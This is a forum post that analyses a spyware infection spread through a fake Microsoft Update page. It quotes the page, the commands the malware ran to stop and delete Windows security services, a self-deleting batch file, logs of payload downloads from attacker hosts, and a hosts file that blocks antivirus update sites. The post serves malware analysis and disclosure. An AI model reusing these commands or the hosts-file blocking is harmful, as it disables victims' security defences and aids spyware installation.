http://www.spywarewarrior.com/viewtopic.php?t=20016
The site has been shut down thanks to Suzi's help .. take a look at her Video of the hijack installation.
QUOTE
Now you can get updates for Windows, Office and other Microsoft applications all in one place. Microsoft Update is a new service that brings you all the features and benefits of Windows Update plus downloads for other Microsoft applications including Office.
Final Step
To verify your Windows copy download and run setup programm, click,
hxxp ://68.178.170.123/wusetup.exe
Works with Automatic Updates:
Adds an easy link to your Start menu:
Microsoft Update Privacy Statement
©2006 Microsoft Corporation. All rights reserved. Terms of Use |Privacy Statement
Final Step
To verify your Windows copy download and run setup programm, click,
hxxp ://68.178.170.123/wusetup.exe
Works with Automatic Updates:
Adds an easy link to your Start menu:
Microsoft Update Privacy Statement
©2006 Microsoft Corporation. All rights reserved. Terms of Use |Privacy Statement
------------
Files logged
----------
They tried to stop and delete the sp2 security center many times , but I dont have sp2..
QUOTE
net stop wscsvc
sc delete wscsvc
net1 stop shared access
sc delete shared access
net start mswinlogonprocservice
net1 start mswinlogonprocservice
sc delete mctskshd.exe
sc delete wscsvc
net1 stop shared access
sc delete shared access
net start mswinlogonprocservice
net1 start mswinlogonprocservice
sc delete mctskshd.exe
----------
1.wmf
hxxp ://68.178.170.123/1.wmf
----------
a.exe
a.bat
-----------
net.exe
net1.exe
--------------------
ieschedule.exe -> Internet Explorer Update Schedule
ieschedule.bat
--------------------
Keylogger :
ib7.dll - BHO
QUOTE
ib.CBrowserHelper
BHO
{1E6CE4CD-161B-4847-B8BF-E2EF72299D69}
C:\WINDOWS\System32\ib7.dll
Enabled
All Users
BHO
{1E6CE4CD-161B-4847-B8BF-E2EF72299D69}
C:\WINDOWS\System32\ib7.dll
Enabled
All Users
--------------------
harvest.exe -> outlook wabber
harvest.bat
--------------------
ieserver.exe -> Microsoft Windows HTTP Proxy Service Update
--------------------
smss.exe
C:\WINDOWS\smss.exe -> runs harvest.exe
----------
C:\WINDOWS\winlogon.exe - I-Worm-Netsky.d worm
http://www.f-secure.com/v-descs/netsky_d.shtml
--------------------
wusetup.exe
hosts.sam
----
All .bat files contain:
CODE
@echo off
:delfile
del %1
if exist %1 goto delfile
del %2
exit
:delfile
del %1
if exist %1 goto delfile
del %2
exit
----------------------------------
Internet Log :
QUOTE
hxxp ://68.178.170.123/1.wmf
hxxp ://68.178.170.123/opt-in1.jpg
hxxp ://68.178.170.123/opt-in2.gif
hxxp ://68.178.170.123/welcome.jpg
hxxp ://68.178.170.123/button2.jpg
hxxp ://68.178.170.123/opt-in1.jpg
hxxp ://68.178.170.123/opt-in2.gif
MyIE Web Browser hxxp://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp%3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser GET hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp %3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser hxxp ://68.178.170.123/favicon.ico
MyIE Web Browser GET hxxp ://68.178.170.123/favicon.ico
MyIE Web Browser hxxp ://hit5.hotlog.ru/cgi-bin/hotlog/img?im=1&v=211,23077,169,4704,184,5561
MyIE Web Browser hxxp ://68.178.170.123/wusetup.exe
MyIE Web Browser hxxp ://68.178.170.123/button4.jpg
MyIE Web Browser hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp%3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser GET hxxp ://68.178.170.123/button3.jpg
MyIE Web Browser GET hxxp ://68.178.170.123/button4.jpg
MyIE Web Browser GET hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp %3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser hxxp://68.178.170.123/button3.jpg
hxxp ://hit5.hotlog.ru/cgi-bin/hotlog/img?im=1&v=212,23078,169,4704,184,5561
hxxp ://dxtserver1.net/source/bin/ieschedule.exe
Internet Explorer Update Schedule = hxxp ://dxtserver1.net/source/bin//count.php?simple=1&user=SPYWAREHUNTER-18821&country=united%20states&iso=us®ion=tx&city=plano
Session Manager Subsystem GET hxxp ://wnplake.net/admin/v12.html?us
Session Manager Subsystem = hxxp ://dxtserver1.net/source/bin/strana/!all//harvest.exe
Session Manager Subsystem GET hxxp ://dxtserver1.net/source/bin/strana/!all//ieserver.exe
Session Manager Subsystem hxxp ://dxtserver1.net/source/bin/strana/!all//ieserver.exe
11/2/2003 6:19:58 PM Internet Explorer Update Schedule GET hxxp ://dxtserver1.net/source/bin//ib7.dll
11/2/2003 6:20:24 PM Internet Explorer Update Schedule http ://dxtserver1.net/source/bin//smss.exe
11/2/2003 6:21:51 PM Internet Explorer Update Schedule http ://dxtserver1.net/source/bin//count.php?user=SPYWAREHUNTER-18821 localhost URL
11/2/2003 6:22:08 PM Internet Explorer Update Schedule hxxp ://detectlocation.ru/cgi-bin/js.pl?66.139.76.17
hxxp ://68.178.170.123/opt-in1.jpg
hxxp ://68.178.170.123/opt-in2.gif
hxxp ://68.178.170.123/welcome.jpg
hxxp ://68.178.170.123/button2.jpg
hxxp ://68.178.170.123/opt-in1.jpg
hxxp ://68.178.170.123/opt-in2.gif
MyIE Web Browser hxxp://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp%3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser GET hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp %3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser hxxp ://68.178.170.123/favicon.ico
MyIE Web Browser GET hxxp ://68.178.170.123/favicon.ico
MyIE Web Browser hxxp ://hit5.hotlog.ru/cgi-bin/hotlog/img?im=1&v=211,23077,169,4704,184,5561
MyIE Web Browser hxxp ://68.178.170.123/wusetup.exe
MyIE Web Browser hxxp ://68.178.170.123/button4.jpg
MyIE Web Browser hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp%3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser GET hxxp ://68.178.170.123/button3.jpg
MyIE Web Browser GET hxxp ://68.178.170.123/button4.jpg
MyIE Web Browser GET hxxp ://hit15.hotlog.ru/cgi-bin/hotlog/count?0.8161752715420998&s=340055&im=1&r=&pg=hxxp %3A//68.178.170.123/&c=Y&j=Y&wh=1024x768&px=32&js=1.3&
MyIE Web Browser hxxp://68.178.170.123/button3.jpg
hxxp ://hit5.hotlog.ru/cgi-bin/hotlog/img?im=1&v=212,23078,169,4704,184,5561
hxxp ://dxtserver1.net/source/bin/ieschedule.exe
Internet Explorer Update Schedule = hxxp ://dxtserver1.net/source/bin//count.php?simple=1&user=SPYWAREHUNTER-18821&country=united%20states&iso=us®ion=tx&city=plano
Session Manager Subsystem GET hxxp ://wnplake.net/admin/v12.html?us
Session Manager Subsystem = hxxp ://dxtserver1.net/source/bin/strana/!all//harvest.exe
Session Manager Subsystem GET hxxp ://dxtserver1.net/source/bin/strana/!all//ieserver.exe
Session Manager Subsystem hxxp ://dxtserver1.net/source/bin/strana/!all//ieserver.exe
11/2/2003 6:19:58 PM Internet Explorer Update Schedule GET hxxp ://dxtserver1.net/source/bin//ib7.dll
11/2/2003 6:20:24 PM Internet Explorer Update Schedule http ://dxtserver1.net/source/bin//smss.exe
11/2/2003 6:21:51 PM Internet Explorer Update Schedule http ://dxtserver1.net/source/bin//count.php?user=SPYWAREHUNTER-18821 localhost URL
11/2/2003 6:22:08 PM Internet Explorer Update Schedule hxxp ://detectlocation.ru/cgi-bin/js.pl?66.139.76.17
Thats really weird with the time entries in the last part of the logs showing up as from 2003 ... but hey all they get is my proxy IP.
--------------------------------------
68.178.170.123 = ip-68-178-170-123.ip.secureserver.net.
wnplake.net - 81.177.28.14
CODE
[B][COLOR=red]61 domains found on 81.177.28.14[/COLOR][/B]
.www.Wnplake.net
.www.Abpgroup.info
.www.Ak-chemicals.com
.www.Alfa-park-centre.com
.www.Amwayst.net
.www.Annaivanova.com
.www.Apmatypa.com
.www.Ateks.net
.www.Avtohart.com
.www.Bestchinesemanufacturers.com
.www.Bitum.org
.www.Capitanflint.com
.www.Chemdel.net
.www.Chpg-tyre.com
.www.Da2info.com
.www.Dating-s.net
.www.Dressirovka.com
.www.Erafound.org
.www.Fregat.info
.www.Hddprotector.com
.www.Ibm52005.info
.www.Iic-ru.com
.www.Jaguar-invest.com
.www.Juriksoft.net
.www.Klassiki.com
.www.Korsun.org
.www.Kreditka.info
.www.Kucha-safe.net
.www.Kvl-tour.net
.www.Lightoze.net
.www.Luxstyling.com
.www.Mega-stroi.com
.www.Mmg-rus.com
.www.Mosrealt.info
.www.Mtuci.org
.www.Nashi-spb.org
.www.Novoros.info
.www.Otherplanetsphinx.com
.www.Proffy.info
.www.Ra21.com
.www.Ratan.org
.www.Rmmonline.com
.www.Rukav.net
.www.Russcollector.com
.www.Rzzp.com
.www.Schelkovo.net
.www.Secur-exchange.com
.www.Shesayyes.com
.www.Souz-m.com
.www.Souzpromplast.com
.www.Strahovaya.com
.www.Suchki.org
.www.Supershina.com
.www.Turique.com
.www.Udaff.biz
.www.Vavilova.org
.www.Vishivki.net
.www.You-it-can.com
.www.Znaki.net
.www.Otherplanetsphynx.com
.www.Desktopa.net
.www.Wnplake.net
.www.Abpgroup.info
.www.Ak-chemicals.com
.www.Alfa-park-centre.com
.www.Amwayst.net
.www.Annaivanova.com
.www.Apmatypa.com
.www.Ateks.net
.www.Avtohart.com
.www.Bestchinesemanufacturers.com
.www.Bitum.org
.www.Capitanflint.com
.www.Chemdel.net
.www.Chpg-tyre.com
.www.Da2info.com
.www.Dating-s.net
.www.Dressirovka.com
.www.Erafound.org
.www.Fregat.info
.www.Hddprotector.com
.www.Ibm52005.info
.www.Iic-ru.com
.www.Jaguar-invest.com
.www.Juriksoft.net
.www.Klassiki.com
.www.Korsun.org
.www.Kreditka.info
.www.Kucha-safe.net
.www.Kvl-tour.net
.www.Lightoze.net
.www.Luxstyling.com
.www.Mega-stroi.com
.www.Mmg-rus.com
.www.Mosrealt.info
.www.Mtuci.org
.www.Nashi-spb.org
.www.Novoros.info
.www.Otherplanetsphinx.com
.www.Proffy.info
.www.Ra21.com
.www.Ratan.org
.www.Rmmonline.com
.www.Rukav.net
.www.Russcollector.com
.www.Rzzp.com
.www.Schelkovo.net
.www.Secur-exchange.com
.www.Shesayyes.com
.www.Souz-m.com
.www.Souzpromplast.com
.www.Strahovaya.com
.www.Suchki.org
.www.Supershina.com
.www.Turique.com
.www.Udaff.biz
.www.Vavilova.org
.www.Vishivki.net
.www.You-it-can.com
.www.Znaki.net
.www.Otherplanetsphynx.com
.www.Desktopa.net
Outbound FTP connection to dxtserver.net - 81.177.28.3
QUOTE
Web server hosts 77 websites
Reverse DNS: cp40.agava.net
-
inetnum: 81.177.28.0 - 81.177.29.255
netname: AGAVA
descr: AGAVA Software Ltd Network
country: RU
admin-c: VVP44-RIPE
tech-c: IA327-RIPE
tech-c: AK305-RIPE
status: ASSIGNED PA
mnt-by: AS8342-MNT
source: RIPE # Filtered
Reverse DNS: cp40.agava.net
-
inetnum: 81.177.28.0 - 81.177.29.255
netname: AGAVA
descr: AGAVA Software Ltd Network
country: RU
admin-c: VVP44-RIPE
tech-c: IA327-RIPE
tech-c: AK305-RIPE
status: ASSIGNED PA
mnt-by: AS8342-MNT
source: RIPE # Filtered
CODE
77 domains found on 81.177.28.3
.www.21bek.org
.www.Akvarelcafe.com
.www.Alfastroy.com
.www.Anisimovka.com
.www.Ara-industry.com
.www.Artatv.com
.www.Bardy2.net
.www.Barier-cs.com
.www.Bisershop.com
.www.Crazylol.com
.www.Detectlocation.info
.www.Devo4ek.net
.www.Dkukz.com
.www.Dudikato.com
.www.Dxtadm.net
.www.Dxtserver.net
.www.Dxtserver1.net
.www.Dxtserver2.net
.www.Eliatex-bel.com
.www.Elite-eskort.com
.www.Evro-stroy.com
.www.Eye-sos.com
.www.Faberon.net
.www.Faleristmarket.com
.www.Fundofgrowth.org
.www.Gta-limited.com
.www.Info-market.org
.www.Infocentr.info
.www.Inmast.com
.www.Jelezzo.com
.www.Klevo.net
.www.Kupils.net
.www.Kuzoff.com
.www.Lolimages.com
.www.Marspipe.com
.www.Mhprj.com
.www.Neotelinfo.net
.www.Npocmumymku.com
.www.Otvalentina.com
.www.Otzhig.com
.www.Pel-online.com
.www.Pidan.info
.www.Plazalog.com
.www.Problemnet.net
.www.Proficentre.com
.www.Rapsody.biz
.www.Ravenscourtgalleries.com
.www.Realstoriesstory.com
.www.Riveiro.info
.www.Rus-souvenir.com
.www.Rusfest.com
.www.Russia-spb.com
.www.Russian-internet-business.com
.www.Salesoft.biz
.www.Serosti.net
.www.Seven-super.com
.www.Sfinks-group.com
.www.Sic-nt.com
.www.Sk-si.com
.www.Startcopy.info
.www.Streletz.com
.www.Styxclub.com
.www.Teplocom.net
.www.Timurlansky.com
.www.Top10-search.com
.www.Tuktarov.com
.www.Tuvaetno.com
.www.Uamafia.com
.www.Udareniye.com
.www.Uzbegimblog.com
.www.Vachdom.com
.www.Varlamov.net
.www.Volgabereg.com
.www.Worldofcs.com
.www.Zdorov.org
.www.Zed-tech.biz
.www.Alfa-park.com
.www.21bek.org
.www.Akvarelcafe.com
.www.Alfastroy.com
.www.Anisimovka.com
.www.Ara-industry.com
.www.Artatv.com
.www.Bardy2.net
.www.Barier-cs.com
.www.Bisershop.com
.www.Crazylol.com
.www.Detectlocation.info
.www.Devo4ek.net
.www.Dkukz.com
.www.Dudikato.com
.www.Dxtadm.net
.www.Dxtserver.net
.www.Dxtserver1.net
.www.Dxtserver2.net
.www.Eliatex-bel.com
.www.Elite-eskort.com
.www.Evro-stroy.com
.www.Eye-sos.com
.www.Faberon.net
.www.Faleristmarket.com
.www.Fundofgrowth.org
.www.Gta-limited.com
.www.Info-market.org
.www.Infocentr.info
.www.Inmast.com
.www.Jelezzo.com
.www.Klevo.net
.www.Kupils.net
.www.Kuzoff.com
.www.Lolimages.com
.www.Marspipe.com
.www.Mhprj.com
.www.Neotelinfo.net
.www.Npocmumymku.com
.www.Otvalentina.com
.www.Otzhig.com
.www.Pel-online.com
.www.Pidan.info
.www.Plazalog.com
.www.Problemnet.net
.www.Proficentre.com
.www.Rapsody.biz
.www.Ravenscourtgalleries.com
.www.Realstoriesstory.com
.www.Riveiro.info
.www.Rus-souvenir.com
.www.Rusfest.com
.www.Russia-spb.com
.www.Russian-internet-business.com
.www.Salesoft.biz
.www.Serosti.net
.www.Seven-super.com
.www.Sfinks-group.com
.www.Sic-nt.com
.www.Sk-si.com
.www.Startcopy.info
.www.Streletz.com
.www.Styxclub.com
.www.Teplocom.net
.www.Timurlansky.com
.www.Top10-search.com
.www.Tuktarov.com
.www.Tuvaetno.com
.www.Uamafia.com
.www.Udareniye.com
.www.Uzbegimblog.com
.www.Vachdom.com
.www.Varlamov.net
.www.Volgabereg.com
.www.Worldofcs.com
.www.Zdorov.org
.www.Zed-tech.biz
.www.Alfa-park.com
Hosts.sam -> C:\WINDOWS\hosts.sam
QUOTE
10.0.0.1 avp.com
10.0.0.1 kaspersky.com
10.0.0.1 kaspersky-labs.com
10.0.0.1 updates1.kaspersky.com
10.0.0.1 updates2.kaspersky.com
10.0.0.1 updates3.kaspersky.com
10.0.0.1 updates-us1.kaspersky.com
10.0.0.1 downloads1.kaspersky.com
10.0.0.1 downloads-us1.kaspersky.com
10.0.0.1 www.avp.com
10.0.0.1 www.kaspersky.com
10.0.0.1 d-ru-1f.kaspersky-labs.com
10.0.0.1 d-ru-1h.kaspersky-labs.com
10.0.0.1 d-ru-2f.kaspersky-labs.com
10.0.0.1 d-ru-2h.kaspersky-labs.com
10.0.0.1 d-eu-2f.kaspersky-labs.com
10.0.0.1 d-eu-2h.kaspersky-labs.com
10.0.0.1 d-eu-1f.kaspersky-labs.com
10.0.0.1 d-eu-1h.kaspersky-labs.com
10.0.0.1 d-us-1f.kaspersky-labs.com
10.0.0.1 d-us-1h.kaspersky-labs.com
10.0.0.1 downloads1.kaspersky.ru
10.0.0.1 downloads2.kaspersky.ru
10.0.0.1 downloads3.kaspersky.ru
10.0.0.1 downloads4.kaspersky.ru
10.0.0.1 downloads5.kaspersky.ru
10.0.0.1 eset.com
10.0.0.1 www.eset.com
10.0.0.1 u2.eset.com
10.0.0.1 u3.eset.com
10.0.0.1 u4.eset.com
10.0.0.1 u7.eset.com
10.0.0.1 82.165.250.33
10.0.0.1 82.165.237.14
10.0.0.1 customer.symantec.com
10.0.0.1 liveupdate.symantec.com
10.0.0.1 liveupdate.symantecliveupdate.com
10.0.0.1 securityresponse.symantec.com
10.0.0.1 symantec.com
10.0.0.1 update.symantec.com
10.0.0.1 updates.symantec.com
10.0.0.1 www.symantec.com
10.0.0.1 mast.mcafee.com
10.0.0.1 mcafee.com
10.0.0.1 rads.mcafee.com
10.0.0.1 www.mcafee.com
10.0.0.1 us.mcafee.com
10.0.0.1 dispatch.mcafee.com
10.0.0.1 download.mcafee.com
10.0.0.1 metalhead2005.info
10.0.0.1 my-etrust.com
10.0.0.1 nai.com
10.0.0.1 networkassociates.com
10.0.0.1 secure.nai.com
10.0.0.1 sophos.com
10.0.0.1 trendmicro.com
10.0.0.1 viruslist.com
10.0.0.1 viruslist.com
10.0.0.1 www.ca.com
10.0.0.1 www.f-secure.com
10.0.0.1 www.microsoft.com
10.0.0.1 www.my-etrust.com
10.0.0.1 www.nai.com
10.0.0.1 www.networkassociates.com
10.0.0.1 www.sophos.com
10.0.0.1 www.trendmicro.com
10.0.0.1 www.viruslist.com
10.0.0.1 ca.com
10.0.0.1 d66.myleftnut.info
10.0.0.1 f-secure.com
10.0.0.1 irc.blackcarder.net
10.0.0.1 kaspersky.com
10.0.0.1 kaspersky-labs.com
10.0.0.1 updates1.kaspersky.com
10.0.0.1 updates2.kaspersky.com
10.0.0.1 updates3.kaspersky.com
10.0.0.1 updates-us1.kaspersky.com
10.0.0.1 downloads1.kaspersky.com
10.0.0.1 downloads-us1.kaspersky.com
10.0.0.1 www.avp.com
10.0.0.1 www.kaspersky.com
10.0.0.1 d-ru-1f.kaspersky-labs.com
10.0.0.1 d-ru-1h.kaspersky-labs.com
10.0.0.1 d-ru-2f.kaspersky-labs.com
10.0.0.1 d-ru-2h.kaspersky-labs.com
10.0.0.1 d-eu-2f.kaspersky-labs.com
10.0.0.1 d-eu-2h.kaspersky-labs.com
10.0.0.1 d-eu-1f.kaspersky-labs.com
10.0.0.1 d-eu-1h.kaspersky-labs.com
10.0.0.1 d-us-1f.kaspersky-labs.com
10.0.0.1 d-us-1h.kaspersky-labs.com
10.0.0.1 downloads1.kaspersky.ru
10.0.0.1 downloads2.kaspersky.ru
10.0.0.1 downloads3.kaspersky.ru
10.0.0.1 downloads4.kaspersky.ru
10.0.0.1 downloads5.kaspersky.ru
10.0.0.1 eset.com
10.0.0.1 www.eset.com
10.0.0.1 u2.eset.com
10.0.0.1 u3.eset.com
10.0.0.1 u4.eset.com
10.0.0.1 u7.eset.com
10.0.0.1 82.165.250.33
10.0.0.1 82.165.237.14
10.0.0.1 customer.symantec.com
10.0.0.1 liveupdate.symantec.com
10.0.0.1 liveupdate.symantecliveupdate.com
10.0.0.1 securityresponse.symantec.com
10.0.0.1 symantec.com
10.0.0.1 update.symantec.com
10.0.0.1 updates.symantec.com
10.0.0.1 www.symantec.com
10.0.0.1 mast.mcafee.com
10.0.0.1 mcafee.com
10.0.0.1 rads.mcafee.com
10.0.0.1 www.mcafee.com
10.0.0.1 us.mcafee.com
10.0.0.1 dispatch.mcafee.com
10.0.0.1 download.mcafee.com
10.0.0.1 metalhead2005.info
10.0.0.1 my-etrust.com
10.0.0.1 nai.com
10.0.0.1 networkassociates.com
10.0.0.1 secure.nai.com
10.0.0.1 sophos.com
10.0.0.1 trendmicro.com
10.0.0.1 viruslist.com
10.0.0.1 viruslist.com
10.0.0.1 www.ca.com
10.0.0.1 www.f-secure.com
10.0.0.1 www.microsoft.com
10.0.0.1 www.my-etrust.com
10.0.0.1 www.nai.com
10.0.0.1 www.networkassociates.com
10.0.0.1 www.sophos.com
10.0.0.1 www.trendmicro.com
10.0.0.1 www.viruslist.com
10.0.0.1 ca.com
10.0.0.1 d66.myleftnut.info
10.0.0.1 f-secure.com
10.0.0.1 irc.blackcarder.net
------------------------------------------------------------------------------
Uploader-AB is a set of files that have the following names
"harvest.exe"
and are built using visual basic. Upon execution of "harvest.exe" which goes by the name "outlook wabber" harvests email addresses and visited url's as well as internet search keywords and logs them into a file "pstore.txt".
This file is created inside a folder by name "drv32dta" which is present in %Sysdir%.
(Where %Sysdir% is the Windows System directory, for example C:\WINDOWS\SYSTEM32)
Some of these files create batch files to delete the temporary files that they create. During analysis it was observed that the logged file "pstore.txt" was not uploaded to any site.
==========================
Spyware Doctor scan detected :
windows\system32\drv32dta
windows\system32\drv32dta\pstore.txt
Positive identifications:
http://vil.nai.com/vil/content/v_138123.htm
http://products.antivir.de/en/threats/BDS_..._C_details.html
http://avira.com/en/threats/section/fullde...dor.et.3.c.html
QUOTE
– [HKCR\TypeLib\{14A5F3E7-B235-4D98-9264-5C67D2657BC4}\2.0\0\win32]
• @="%malware execution directory%\ib6.dll"
• @="%malware execution directory%\ib6.dll"
Aliases:
• Mcafee: Keylog-Sters
• Kaspersky: Trojan-Spy.Win32.Bancos.nw
• TrendMicro: TSPY_BANCOS.BRV
• F-Secure: W32/Banker.GZW
• Sophos: Troj/Bancos-BRV
Its not visible in window explorer but it is in a dos box , using
dir c:\WINDOWS\system32
use the following cmd line to unhide the folder ansd access the keyloggers text file log
attrib -s C:\WINDOWS\system32\drv32dta
--------------------------------------------------------------------------
..
